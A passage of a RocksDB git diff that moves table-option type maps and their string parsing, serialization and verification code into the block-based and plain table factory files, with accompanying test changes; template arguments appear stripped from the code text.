pin_l0_filter_and_index_blocks_in_cache), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"index_type", - {offsetof(struct BlockBasedTableOptions, index_type), - OptionType::kBlockBasedTableIndexType, - OptionVerificationType::kNormal, false, 0}}, - {"hash_index_allow_collision", - {offsetof(struct BlockBasedTableOptions, hash_index_allow_collision), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"checksum", - {offsetof(struct BlockBasedTableOptions, checksum), - OptionType::kChecksumType, OptionVerificationType::kNormal, false, - 0}}, - {"no_block_cache", - {offsetof(struct BlockBasedTableOptions, no_block_cache), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"block_size", - {offsetof(struct BlockBasedTableOptions, block_size), - OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, - {"block_size_deviation", - {offsetof(struct BlockBasedTableOptions, block_size_deviation), - OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, - {"block_restart_interval", - {offsetof(struct BlockBasedTableOptions, block_restart_interval), - OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, - {"index_block_restart_interval", - {offsetof(struct BlockBasedTableOptions, index_block_restart_interval), - OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, - {"index_per_partition", - {0, OptionType::kUInt64T, OptionVerificationType::kDeprecated, false, - 0}}, - {"metadata_block_size", - {offsetof(struct BlockBasedTableOptions, metadata_block_size), - OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}}, - {"partition_filters", - {offsetof(struct BlockBasedTableOptions, partition_filters), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"filter_policy", - {offsetof(struct BlockBasedTableOptions, filter_policy), - OptionType::kFilterPolicy, OptionVerificationType::kByName, false, - 0}}, - {"whole_key_filtering", - {offsetof(struct BlockBasedTableOptions, whole_key_filtering), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"skip_table_builder_flush", - {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, - 0}}, - {"format_version", - {offsetof(struct BlockBasedTableOptions, format_version), - OptionType::kUInt32T, OptionVerificationType::kNormal, false, 0}}, - {"verify_compression", - {offsetof(struct BlockBasedTableOptions, verify_compression), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, - {"read_amp_bytes_per_bit", - {offsetof(struct BlockBasedTableOptions, read_amp_bytes_per_bit), - OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}}; - -static std::unordered_map plain_table_type_info = { - {"user_key_len", - {offsetof(struct PlainTableOptions, user_key_len), OptionType::kUInt32T, - OptionVerificationType::kNormal, false, 0}}, - {"bloom_bits_per_key", - {offsetof(struct PlainTableOptions, bloom_bits_per_key), OptionType::kInt, - OptionVerificationType::kNormal, false, 0}}, - {"hash_table_ratio", - {offsetof(struct PlainTableOptions, hash_table_ratio), OptionType::kDouble, - OptionVerificationType::kNormal, false, 0}}, - {"index_sparseness", - {offsetof(struct PlainTableOptions, index_sparseness), OptionType::kSizeT, - OptionVerificationType::kNormal, false, 0}}, - {"huge_page_tlb_size", - {offsetof(struct PlainTableOptions, huge_page_tlb_size), - OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, - {"encoding_type", - {offsetof(struct PlainTableOptions, encoding_type), - OptionType::kEncodingType, OptionVerificationType::kByName, false, 0}}, - {"full_scan_mode", - {offsetof(struct PlainTableOptions, full_scan_mode), OptionType::kBoolean, - OptionVerificationType::kNormal, false, 0}}, - {"store_index_in_file", - {offsetof(struct PlainTableOptions, store_index_in_file), - OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}}; - static std::unordered_map compression_type_string_map = { {"kNoCompression", kNoCompression}, @@ -745,6 +639,12 @@ static std::unordered_map info_log_level_string_map = {"FATAL_LEVEL", InfoLogLevel::FATAL_LEVEL}, {"HEADER_LEVEL", InfoLogLevel::HEADER_LEVEL}}; +extern Status StringToMap( + const std::string& opts_str, + std::unordered_map* opts_map); + +extern bool ParseOptionHelper(char* opt_address, const OptionType& opt_type, + const std::string& value); #endif // !ROCKSDB_LITE } // namespace rocksdb diff --git a/options/options_parser.cc b/options/options_parser.cc index d5a3fec6ef0..2cb60a068ca 100644 --- a/options/options_parser.cc +++ b/options/options_parser.cc @@ -16,6 +16,7 @@ #include "options/options_helper.h" #include "rocksdb/convenience.h" #include "rocksdb/db.h" +#include "util/cast_util.h" #include "util/string_util.h" #include "util/sync_point.h" @@ -84,7 +85,8 @@ Status PersistRocksDBOptions(const DBOptions& db_opt, writable->Append("[" + opt_section_titles[kOptionSectionTableOptions] + tf->Name() + " \"" + EscapeOptionString(cf_names[i]) + "\"]\n "); - s = GetStringFromTableFactory(&options_file_content, tf, "\n "); + options_file_content.clear(); + s = tf->GetOptionString(&options_file_content, "\n "); if (!s.ok()) { return s; } @@ -507,6 +509,7 @@ namespace { bool AreEqualDoubles(const double a, const double b) { return (fabs(a - b) < 0.00001); } +} // namespace bool AreEqualOptions( const char* opt1, const char* opt2, const OptionTypeInfo& type_info, @@ -613,8 +616,6 @@ bool AreEqualOptions( } } -} // namespace - Status RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( const DBOptions& db_opt, const std::vector& cf_names, const std::vector& cf_opts, @@ -762,59 +763,23 @@ Status RocksDBOptionsParser::VerifyCFOptions( return Status::OK(); } -Status RocksDBOptionsParser::VerifyBlockBasedTableFactory( - const BlockBasedTableFactory* base_tf, - const BlockBasedTableFactory* file_tf, - OptionsSanityCheckLevel sanity_check_level) { - if ((base_tf != nullptr) != (file_tf != nullptr) && - sanity_check_level > kSanityLevelNone) { - return Status::Corruption( - "[RocksDBOptionsParser]: Inconsistent TableFactory class type"); - } - if (base_tf == nullptr) { - return Status::OK(); - } - assert(file_tf != nullptr); - - const auto& base_opt = base_tf->table_options(); - const auto& file_opt = file_tf->table_options(); - - for (auto& pair : block_based_table_type_info) { - if (pair.second.verification == OptionVerificationType::kDeprecated) { - // We skip checking deprecated variables as they might - // contain random values since they might not be initialized - continue; - } - if (BBTOptionSanityCheckLevel(pair.first) <= sanity_check_level) { - if (!AreEqualOptions(reinterpret_cast(&base_opt), - reinterpret_cast(&file_opt), - pair.second, pair.first, nullptr)) { - return Status::Corruption( - "[RocksDBOptionsParser]: " - "failed the verification on BlockBasedTableOptions::", - pair.first); - } - } - } - return Status::OK(); -} - Status RocksDBOptionsParser::VerifyTableFactory( const TableFactory* base_tf, const TableFactory* file_tf, OptionsSanityCheckLevel sanity_check_level) { if (base_tf && file_tf) { if (sanity_check_level > kSanityLevelNone && - base_tf->Name() != file_tf->Name()) { + std::string(base_tf->Name()) != std::string(file_tf->Name())) { return Status::Corruption( "[RocksDBOptionsParser]: " "failed the verification on TableFactory->Name()"); } - auto s = VerifyBlockBasedTableFactory( - dynamic_cast(base_tf), - dynamic_cast(file_tf), - sanity_check_level); - if (!s.ok()) { - return s; + if (base_tf->Name() == BlockBasedTableFactory::kName) { + return VerifyBlockBasedTableFactory( + static_cast_with_check(base_tf), + static_cast_with_check(file_tf), + sanity_check_level); } // TODO(yhchiang): add checks for other table factory types } else { diff --git a/options/options_parser.h b/options/options_parser.h index cae3dbba9b4..5545c0b0fa8 100644 --- a/options/options_parser.h +++ b/options/options_parser.h @@ -38,6 +38,11 @@ Status PersistRocksDBOptions(const DBOptions& db_opt, const std::vector& cf_opts, const std::string& file_name, Env* env); +extern bool AreEqualOptions( + const char* opt1, const char* opt2, const OptionTypeInfo& type_info, + const std::string& opt_name, + const std::unordered_map* opt_map); + class RocksDBOptionsParser { public: explicit RocksDBOptionsParser(); @@ -86,11 +91,6 @@ class RocksDBOptionsParser { const TableFactory* base_tf, const TableFactory* file_tf, OptionsSanityCheckLevel sanity_check_level = kSanityLevelExactMatch); - static Status VerifyBlockBasedTableFactory( - const BlockBasedTableFactory* base_tf, - const BlockBasedTableFactory* file_tf, - OptionsSanityCheckLevel sanity_check_level); - static Status ExtraParserCheck(const RocksDBOptionsParser& input_parser); protected: diff --git a/options/options_test.cc b/options/options_test.cc index d5eb42b0906..fc4939beb41 100644 --- a/options/options_test.cc +++ b/options/options_test.cc @@ -889,11 +889,11 @@ TEST_F(OptionsTest, ConvertOptionsTest) { ASSERT_EQ(converted_opt.max_open_files, leveldb_opt.max_open_files); ASSERT_EQ(converted_opt.compression, leveldb_opt.compression); - std::shared_ptr table_factory = - std::dynamic_pointer_cast( - converted_opt.table_factory); + std::shared_ptr tb_guard = converted_opt.table_factory; + BlockBasedTableFactory* table_factory = + dynamic_cast(converted_opt.table_factory.get()); - ASSERT_TRUE(table_factory.get() != nullptr); + ASSERT_TRUE(table_factory != nullptr); const BlockBasedTableOptions table_opt = table_factory->table_options(); @@ -1278,6 +1278,11 @@ TEST_F(OptionsParserTest, DumpAndParse) { Random rnd(302); test::RandomInitDBOptions(&base_db_opt, &rnd); base_db_opt.db_log_dir += "/#odd #but #could #happen #path #/\\\\#OMG"; + + BlockBasedTableOptions special_bbto; + special_bbto.cache_index_and_filter_blocks = true; + special_bbto.block_size = 999999; + for (int c = 0; c < num_cf; ++c) { ColumnFamilyOptions cf_opt; Random cf_rnd(0xFB + c); @@ -1287,6 +1292,8 @@ TEST_F(OptionsParserTest, DumpAndParse) { } if (c < 3) { cf_opt.table_factory.reset(test::RandomTableFactory(&rnd, c)); + } else if (c == 4) { + cf_opt.table_factory.reset(NewBlockBasedTableFactory(special_bbto)); } base_cf_opts.emplace_back(cf_opt); } @@ -1298,6 +1305,15 @@ TEST_F(OptionsParserTest, DumpAndParse) { RocksDBOptionsParser parser; ASSERT_OK(parser.Parse(kOptionsFileName, env_.get())); + // Make sure block-based table factory options was deserialized correctly + std::shared_ptr ttf = (*parser.cf_opts())[4].table_factory; + ASSERT_EQ(BlockBasedTableFactory::kName, std::string(ttf->Name())); + const BlockBasedTableOptions& parsed_bbto = + static_cast(ttf.get())->table_options(); + ASSERT_EQ(special_bbto.block_size, parsed_bbto.block_size); + ASSERT_EQ(special_bbto.cache_index_and_filter_blocks, + parsed_bbto.cache_index_and_filter_blocks); + ASSERT_OK(RocksDBOptionsParser::VerifyRocksDBOptionsFromFile( base_db_opt, cf_names, base_cf_opts, kOptionsFileName, env_.get())); diff --git a/table/block_based_table_factory.cc b/table/block_based_table_factory.cc index 4705046bfeb..b4f8ba8a178 100644 --- a/table/block_based_table_factory.cc +++ b/table/block_based_table_factory.cc @@ -13,12 +13,15 @@ #include #include +#include "options/options_helper.h" #include "port/port.h" -#include "rocksdb/flush_block_policy.h" #include "rocksdb/cache.h" +#include "rocksdb/convenience.h" +#include "rocksdb/flush_block_policy.h" #include "table/block_based_table_builder.h" #include "table/block_based_table_reader.h" #include "table/format.h" +#include "util/string_util.h" namespace rocksdb { @@ -201,15 +204,203 @@ std::string BlockBasedTableFactory::GetPrintableTableOptions() const { return ret; } +#ifndef ROCKSDB_LITE +namespace { +bool SerializeSingleBlockBasedTableOption( + std::string* opt_string, const BlockBasedTableOptions& bbt_options, + const std::string& name, const std::string& delimiter) { + auto iter = block_based_table_type_info.find(name); + if (iter == block_based_table_type_info.end()) { + return false; + } + auto& opt_info = iter->second; + const char* opt_address = + reinterpret_cast(&bbt_options) + opt_info.offset; + std::string value; + bool result = SerializeSingleOptionHelper(opt_address, opt_info.type, &value); + if (result) { + *opt_string = name + "=" + value + delimiter; + } + return result; +} +} // namespace + +Status BlockBasedTableFactory::GetOptionString( + std::string* opt_string, const std::string& delimiter) const { + assert(opt_string); + opt_string->clear(); + for (auto iter = block_based_table_type_info.begin(); + iter != block_based_table_type_info.end(); ++iter) { + if (iter->second.verification == OptionVerificationType::kDeprecated) { + // If the option is no longer used in rocksdb and marked as deprecated, + // we skip it in the serialization. + continue; + } + std::string single_output; + bool result = SerializeSingleBlockBasedTableOption( + &single_output, table_options_, iter->first, delimiter); + assert(result); + if (result) { + opt_string->append(single_output); + } + } + return Status::OK(); +} +#else +Status BlockBasedTableFactory::GetOptionString( + std::string* opt_string, const std::string& delimiter) const { + return Status::OK(); +} +#endif // !ROCKSDB_LITE + const BlockBasedTableOptions& BlockBasedTableFactory::table_options() const { return table_options_; } +#ifndef ROCKSDB_LITE +namespace { +std::string ParseBlockBasedTableOption(const std::string& name, + const std::string& org_value, + BlockBasedTableOptions* new_options, + bool input_strings_escaped = false, + bool ignore_unknown_options = false) { + const std::string& value = + input_strings_escaped ? UnescapeOptionString(org_value) : org_value; + if (!input_strings_escaped) { + // if the input string is not escaped, it means this function is + // invoked from SetOptions, which takes the old format. + if (name == "block_cache") { + new_options->block_cache = NewLRUCache(ParseSizeT(value)); + return ""; + } else if (name == "block_cache_compressed") { + new_options->block_cache_compressed = NewLRUCache(ParseSizeT(value)); + return ""; + } else if (name == "filter_policy") { + // Expect the following format + // bloomfilter:int:bool + const std::string kName = "bloomfilter:"; + if (value.compare(0, kName.size(), kName) != 0) { + return "Invalid filter policy name"; + } + size_t pos = value.find(':', kName.size()); + if (pos == std::string::npos) { + return "Invalid filter policy config, missing bits_per_key"; + } + int bits_per_key = + ParseInt(trim(value.substr(kName.size(), pos - kName.size()))); + bool use_block_based_builder = + ParseBoolean("use_block_based_builder", trim(value.substr(pos + 1))); + new_options->filter_policy.reset( + NewBloomFilterPolicy(bits_per_key, use_block_based_builder)); + return ""; + } + } + const auto iter = block_based_table_type_info.find(name); + if (iter == block_based_table_type_info.end()) { + if (ignore_unknown_options) { + return ""; + } else { + return "Unrecognized option"; + } + } + const auto& opt_info = iter->second; + if (opt_info.verification != OptionVerificationType::kDeprecated && + !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, + opt_info.type, value)) { + return "Invalid value"; + } + return ""; +} +} // namespace + +Status GetBlockBasedTableOptionsFromString( + const BlockBasedTableOptions& table_options, const std::string& opts_str, + BlockBasedTableOptions* new_table_options) { + std::unordered_map opts_map; + Status s = StringToMap(opts_str, &opts_map); + if (!s.ok()) { + return s; + } + + return GetBlockBasedTableOptionsFromMap(table_options, opts_map, + new_table_options); +} + +Status GetBlockBasedTableOptionsFromMap( + const BlockBasedTableOptions& table_options, + const std::unordered_map& opts_map, + BlockBasedTableOptions* new_table_options, bool input_strings_escaped, + bool ignore_unknown_options) { + assert(new_table_options); + *new_table_options = table_options; + for (const auto& o : opts_map) { + auto error_message = ParseBlockBasedTableOption( + o.first, o.second, new_table_options, input_strings_escaped, + ignore_unknown_options); + if (error_message != "") { + const auto iter = block_based_table_type_info.find(o.first); + if (iter == block_based_table_type_info.end() || + !input_strings_escaped || // !input_strings_escaped indicates + // the old API, where everything is + // parsable. + (iter->second.verification != OptionVerificationType::kByName && + iter->second.verification != + OptionVerificationType::kByNameAllowNull && + iter->second.verification != OptionVerificationType::kDeprecated)) { + // Restore "new_options" to the default "base_options". + *new_table_options = table_options; + return Status::InvalidArgument("Can't parse BlockBasedTableOptions:", + o.first + " " + error_message); + } + } + } + return Status::OK(); +} + +Status VerifyBlockBasedTableFactory( + const BlockBasedTableFactory* base_tf, + const BlockBasedTableFactory* file_tf, + OptionsSanityCheckLevel sanity_check_level) { + if ((base_tf != nullptr) != (file_tf != nullptr) && + sanity_check_level > kSanityLevelNone) { + return Status::Corruption( + "[RocksDBOptionsParser]: Inconsistent TableFactory class type"); + } + if (base_tf == nullptr) { + return Status::OK(); + } + assert(file_tf != nullptr); + + const auto& base_opt = base_tf->table_options(); + const auto& file_opt = file_tf->table_options(); + + for (auto& pair : block_based_table_type_info) { + if (pair.second.verification == OptionVerificationType::kDeprecated) { + // We skip checking deprecated variables as they might + // contain random values since they might not be initialized + continue; + } + if (BBTOptionSanityCheckLevel(pair.first) <= sanity_check_level) { + if (!AreEqualOptions(reinterpret_cast(&base_opt), + reinterpret_cast(&file_opt), + pair.second, pair.first, nullptr)) { + return Status::Corruption( + "[RocksDBOptionsParser]: " + "failed the verification on BlockBasedTableOptions::", + pair.first); + } + } + } + return Status::OK(); +} +#endif // !ROCKSDB_LITE + TableFactory* NewBlockBasedTableFactory( const BlockBasedTableOptions& _table_options) { return new BlockBasedTableFactory(_table_options); } +const std::string BlockBasedTableFactory::kName = "BlockBasedTable"; const std::string BlockBasedTablePropertyNames::kIndexType = "rocksdb.block.based.table.index.type"; const std::string BlockBasedTablePropertyNames::kWholeKeyFiltering = diff --git a/table/block_based_table_factory.h b/table/block_based_table_factory.h index bdff00d1ee3..39e3eac0b37 100644 --- a/table/block_based_table_factory.h +++ b/table/block_based_table_factory.h @@ -13,9 +13,11 @@ #include #include +#include "db/dbformat.h" +#include "options/options_helper.h" +#include "options/options_parser.h" #include "rocksdb/flush_block_policy.h" #include "rocksdb/table.h" -#include "db/dbformat.h" namespace rocksdb { @@ -31,7 +33,7 @@ class BlockBasedTableFactory : public TableFactory { ~BlockBasedTableFactory() {} - const char* Name() const override { return "BlockBasedTable"; } + const char* Name() const override { return kName.c_str(); } Status NewTableReader( const TableReaderOptions& table_reader_options, @@ -49,12 +51,17 @@ class BlockBasedTableFactory : public TableFactory { std::string GetPrintableTableOptions() const override; + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override; + const BlockBasedTableOptions& table_options() const; void* GetOptions() override { return &table_options_; } bool IsDeleteRangeSupported() const override { return true; } + static const std::string kName; + private: BlockBasedTableOptions table_options_; }; @@ -64,4 +71,87 @@ extern const std::string kHashIndexPrefixesMetadataBlock; extern const std::string kPropTrue; extern const std::string kPropFalse; +#ifndef ROCKSDB_LITE +extern Status VerifyBlockBasedTableFactory( + const BlockBasedTableFactory* base_tf, + const BlockBasedTableFactory* file_tf, + OptionsSanityCheckLevel sanity_check_level); + +static std::unordered_map + block_based_table_type_info = { + /* currently not supported + std::shared_ptr block_cache = nullptr; + std::shared_ptr block_cache_compressed = nullptr; + */ + {"flush_block_policy_factory", + {offsetof(struct BlockBasedTableOptions, flush_block_policy_factory), + OptionType::kFlushBlockPolicyFactory, OptionVerificationType::kByName, + false, 0}}, + {"cache_index_and_filter_blocks", + {offsetof(struct BlockBasedTableOptions, + cache_index_and_filter_blocks), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"cache_index_and_filter_blocks_with_high_priority", + {offsetof(struct BlockBasedTableOptions, + cache_index_and_filter_blocks_with_high_priority), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"pin_l0_filter_and_index_blocks_in_cache", + {offsetof(struct BlockBasedTableOptions, + pin_l0_filter_and_index_blocks_in_cache), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"index_type", + {offsetof(struct BlockBasedTableOptions, index_type), + OptionType::kBlockBasedTableIndexType, + OptionVerificationType::kNormal, false, 0}}, + {"hash_index_allow_collision", + {offsetof(struct BlockBasedTableOptions, hash_index_allow_collision), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"checksum", + {offsetof(struct BlockBasedTableOptions, checksum), + OptionType::kChecksumType, OptionVerificationType::kNormal, false, + 0}}, + {"no_block_cache", + {offsetof(struct BlockBasedTableOptions, no_block_cache), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"block_size", + {offsetof(struct BlockBasedTableOptions, block_size), + OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, + {"block_size_deviation", + {offsetof(struct BlockBasedTableOptions, block_size_deviation), + OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, + {"block_restart_interval", + {offsetof(struct BlockBasedTableOptions, block_restart_interval), + OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, + {"index_block_restart_interval", + {offsetof(struct BlockBasedTableOptions, index_block_restart_interval), + OptionType::kInt, OptionVerificationType::kNormal, false, 0}}, + {"index_per_partition", + {0, OptionType::kUInt64T, OptionVerificationType::kDeprecated, false, + 0}}, + {"metadata_block_size", + {offsetof(struct BlockBasedTableOptions, metadata_block_size), + OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}}, + {"partition_filters", + {offsetof(struct BlockBasedTableOptions, partition_filters), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"filter_policy", + {offsetof(struct BlockBasedTableOptions, filter_policy), + OptionType::kFilterPolicy, OptionVerificationType::kByName, false, + 0}}, + {"whole_key_filtering", + {offsetof(struct BlockBasedTableOptions, whole_key_filtering), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"skip_table_builder_flush", + {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, + 0}}, + {"format_version", + {offsetof(struct BlockBasedTableOptions, format_version), + OptionType::kUInt32T, OptionVerificationType::kNormal, false, 0}}, + {"verify_compression", + {offsetof(struct BlockBasedTableOptions, verify_compression), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}, + {"read_amp_bytes_per_bit", + {offsetof(struct BlockBasedTableOptions, read_amp_bytes_per_bit), + OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}}; +#endif // !ROCKSDB_LITE } // namespace rocksdb diff --git a/table/cuckoo_table_factory.h b/table/cuckoo_table_factory.h index 774dc3c3e80..db860c3d002 100644 --- a/table/cuckoo_table_factory.h +++ b/table/cuckoo_table_factory.h @@ -76,6 +76,11 @@ class CuckooTableFactory : public TableFactory { void* GetOptions() override { return &table_options_; } + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override { + return Status::OK(); + } + private: CuckooTableOptions table_options_; }; diff --git a/table/plain_table_factory.cc b/table/plain_table_factory.cc index eadc2c0995f..5f7809b967d 100644 --- a/table/plain_table_factory.cc +++ b/table/plain_table_factory.cc @@ -5,12 +5,15 @@ #ifndef ROCKSDB_LITE #include "table/plain_table_factory.h" -#include #include +#include #include "db/dbformat.h" +#include "options/options_helper.h" +#include "port/port.h" +#include "rocksdb/convenience.h" #include "table/plain_table_builder.h" #include "table/plain_table_reader.h" -#include "port/port.h" +#include "util/string_util.h" namespace rocksdb { @@ -81,6 +84,143 @@ const PlainTableOptions& PlainTableFactory::table_options() const { return table_options_; } +Status GetPlainTableOptionsFromString(const PlainTableOptions& table_options, + const std::string& opts_str, + PlainTableOptions* new_table_options) { + std::unordered_map opts_map; + Status s = StringToMap(opts_str, &opts_map); + if (!s.ok()) { + return s; + } + return GetPlainTableOptionsFromMap(table_options, opts_map, + new_table_options); +} + +Status GetMemTableRepFactoryFromString( + const std::string& opts_str, + std::unique_ptr* new_mem_factory) { + std::vector opts_list = StringSplit(opts_str, ':'); + size_t len = opts_list.size(); + + if (opts_list.size() <= 0 || opts_list.size() > 2) { + return Status::InvalidArgument("Can't parse memtable_factory option ", + opts_str); + } + + MemTableRepFactory* mem_factory = nullptr; + + if (opts_list[0] == "skip_list") { + // Expecting format + // skip_list: + if (2 == len) { + size_t lookahead = ParseSizeT(opts_list[1]); + mem_factory = new SkipListFactory(lookahead); + } else if (1 == len) { + mem_factory = new SkipListFactory(); + } + } else if (opts_list[0] == "prefix_hash") { + // Expecting format + // prfix_hash: + if (2 == len) { + size_t hash_bucket_count = ParseSizeT(opts_list[1]); + mem_factory = NewHashSkipListRepFactory(hash_bucket_count); + } else if (1 == len) { + mem_factory = NewHashSkipListRepFactory(); + } + } else if (opts_list[0] == "hash_linkedlist") { + // Expecting format + // hash_linkedlist: + if (2 == len) { + size_t hash_bucket_count = ParseSizeT(opts_list[1]); + mem_factory = NewHashLinkListRepFactory(hash_bucket_count); + } else if (1 == len) { + mem_factory = NewHashLinkListRepFactory(); + } + } else if (opts_list[0] == "vector") { + // Expecting format + // vector: + if (2 == len) { + size_t count = ParseSizeT(opts_list[1]); + mem_factory = new VectorRepFactory(count); + } else if (1 == len) { + mem_factory = new VectorRepFactory(); + } + } else if (opts_list[0] == "cuckoo") { + // Expecting format + // cuckoo: + if (2 == len) { + size_t write_buffer_size = ParseSizeT(opts_list[1]); + mem_factory = NewHashCuckooRepFactory(write_buffer_size); + } else if (1 == len) { + return Status::InvalidArgument("Can't parse memtable_factory option ", + opts_str); + } + } else { + return Status::InvalidArgument("Unrecognized memtable_factory option ", + opts_str); + } + + if (mem_factory != nullptr) { + new_mem_factory->reset(mem_factory); + } + + return Status::OK(); +} + +std::string ParsePlainTableOptions(const std::string& name, + const std::string& org_value, + PlainTableOptions* new_options, + bool input_strings_escaped = false, + bool ignore_unknown_options = false) { + const std::string& value = + input_strings_escaped ? UnescapeOptionString(org_value) : org_value; + const auto iter = plain_table_type_info.find(name); + if (iter == plain_table_type_info.end()) { + if (ignore_unknown_options) { + return ""; + } else { + return "Unrecognized option"; + } + } + const auto& opt_info = iter->second; + if (opt_info.verification != OptionVerificationType::kDeprecated && + !ParseOptionHelper(reinterpret_cast(new_options) + opt_info.offset, + opt_info.type, value)) { + return "Invalid value"; + } + return ""; +} + +Status GetPlainTableOptionsFromMap( + const PlainTableOptions& table_options, + const std::unordered_map& opts_map, + PlainTableOptions* new_table_options, bool input_strings_escaped, + bool ignore_unknown_options) { + assert(new_table_options); + *new_table_options = table_options; + for (const auto& o : opts_map) { + auto error_message = ParsePlainTableOptions( + o.first, o.second, new_table_options, input_strings_escaped); + if (error_message != "") { + const auto iter = plain_table_type_info.find(o.first); + if (iter == plain_table_type_info.end() || + !input_strings_escaped || // !input_strings_escaped indicates + // the old API, where everything is + // parsable. + (iter->second.verification != OptionVerificationType::kByName && + iter->second.verification != + OptionVerificationType::kByNameAllowNull && + iter->second.verification != OptionVerificationType::kDeprecated)) { + // Restore "new_options" to the default "base_options". + *new_table_options = table_options; + return Status::InvalidArgument("Can't parse PlainTableOptions:", + o.first + " " + error_message); + } + } + } + return Status::OK(); +} + extern TableFactory* NewPlainTableFactory(const PlainTableOptions& options) { return new PlainTableFactory(options); } diff --git a/table/plain_table_factory.h b/table/plain_table_factory.h index 33cd3134719..6c9ca44f30e 100644 --- a/table/plain_table_factory.h +++ b/table/plain_table_factory.h @@ -9,6 +9,7 @@ #include #include +#include "options/options_helper.h" #include "rocksdb/options.h" #include "rocksdb/table.h" @@ -170,9 +171,40 @@ class PlainTableFactory : public TableFactory { void* GetOptions() override { return &table_options_; } + Status GetOptionString(std::string* opt_string, + const std::string& delimiter) const override { + return Status::OK(); + } + private: PlainTableOptions table_options_; }; +static std::unordered_map plain_table_type_info = { + {"user_key_len", + {offsetof(struct PlainTableOptions, user_key_len), OptionType::kUInt32T, + OptionVerificationType::kNormal, false, 0}}, + {"bloom_bits_per_key", + {offsetof(struct PlainTableOptions, bloom_bits_per_key), OptionType::kInt, + OptionVerificationType::kNormal, false, 0}}, + {"hash_table_ratio", + {offsetof(struct PlainTableOptions, hash_table_ratio), OptionType::kDouble, + OptionVerificationType::kNormal, false, 0}}, + {"index_sparseness", + {offsetof(struct PlainTableOptions, index_sparseness), OptionType::kSizeT, + OptionVerificationType::kNormal, false, 0}}, + {"huge_page_tlb_size", + {offsetof(struct PlainTableOptions, huge_page_tlb_size), + OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}}, + {"encoding_type", + {offsetof(struct PlainTableOptions, encoding_type), + OptionType::kEncodingType, OptionVerificationType::kByName, false, 0}}, + {"full_scan_mode", + {offsetof(struct PlainTableOptions, full_scan_mode), OptionType::kBoolean, + OptionVerificationType::kNormal, false, 0}}, + {"store_index_in_file", + {offsetof(struct PlainTableOptions, store_index_in_file), + OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}}}; + } // namespace rocksdb #endif // ROCKSDB_LITE diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index d10758f04ab..a1c6af0290d 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -28,6 +28,7 @@ #include #include #include +#include #include #include #include @@ -57,6 +58,7 @@ #include "rocksdb/utilities/transaction.h" #include "rocksdb/utilities/transaction_db.h" #include "rocksdb/write_batch.h" +#include "util/cast_util.h" #include "util/compression.h" #include "util/crc32c.h" #include "util/mutexlock.h" @@ -2551,7 +2553,9 @@ void VerifyDBFromDB(std::string& truth_db_name) { } if (FLAGS_simcache_size >= 0) { fprintf(stdout, "SIMULATOR CACHE STATISTICS:\n%s\n", - std::dynamic_pointer_cast(cache_)->ToString().c_str()); + static_cast_with_check(cache_.get()) + ->ToString() + .c_str()); } } diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc index 2cd4d94d112..c8b6221a570 100644 --- a/tools/ldb_cmd.cc +++ b/tools/ldb_cmd.cc @@ -29,6 +29,7 @@ #include "table/scoped_arena_iterator.h" #include "tools/ldb_cmd_impl.h" #include "tools/sst_dump_tool_imp.h" +#include "util/cast_util.h" #include "util/coding.h" #include "util/filename.h" #include "util/stderr_logger.h" @@ -1493,8 +1494,7 @@ void DBDumperCommand::DoDumpCommand() { if (max_keys == 0) break; if (is_db_ttl_) { - TtlIterator* it_ttl = dynamic_cast(iter); - assert(it_ttl); + TtlIterator* it_ttl = static_cast_with_check(iter); rawtime = it_ttl->timestamp(); if (rawtime < ttl_start || rawtime >= ttl_end) { continue; @@ -2291,8 +2291,7 @@ void ScanCommand::DoCommand() { it->Valid() && (!end_key_specified_ || it->key().ToString() < end_key_); it->Next()) { if (is_db_ttl_) { - TtlIterator* it_ttl = dynamic_cast(it); - assert(it_ttl); + TtlIterator* it_ttl = static_cast_with_check(it); int rawtime = it_ttl->timestamp(); if (rawtime < ttl_start || rawtime >= ttl_end) { continue; diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 2a1729c7651..07f34861233 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -14,6 +14,7 @@ #include #include #include +#include #include #include @@ -42,8 +43,6 @@ namespace rocksdb { -using std::dynamic_pointer_cast; - SstFileReader::SstFileReader(const std::string& file_path, bool verify_checksum, bool output_hex) @@ -115,18 +114,13 @@ Status SstFileReader::NewTableReader( unique_ptr* table_reader) { // We need to turn off pre-fetching of index and filter nodes for // BlockBasedTable - shared_ptr 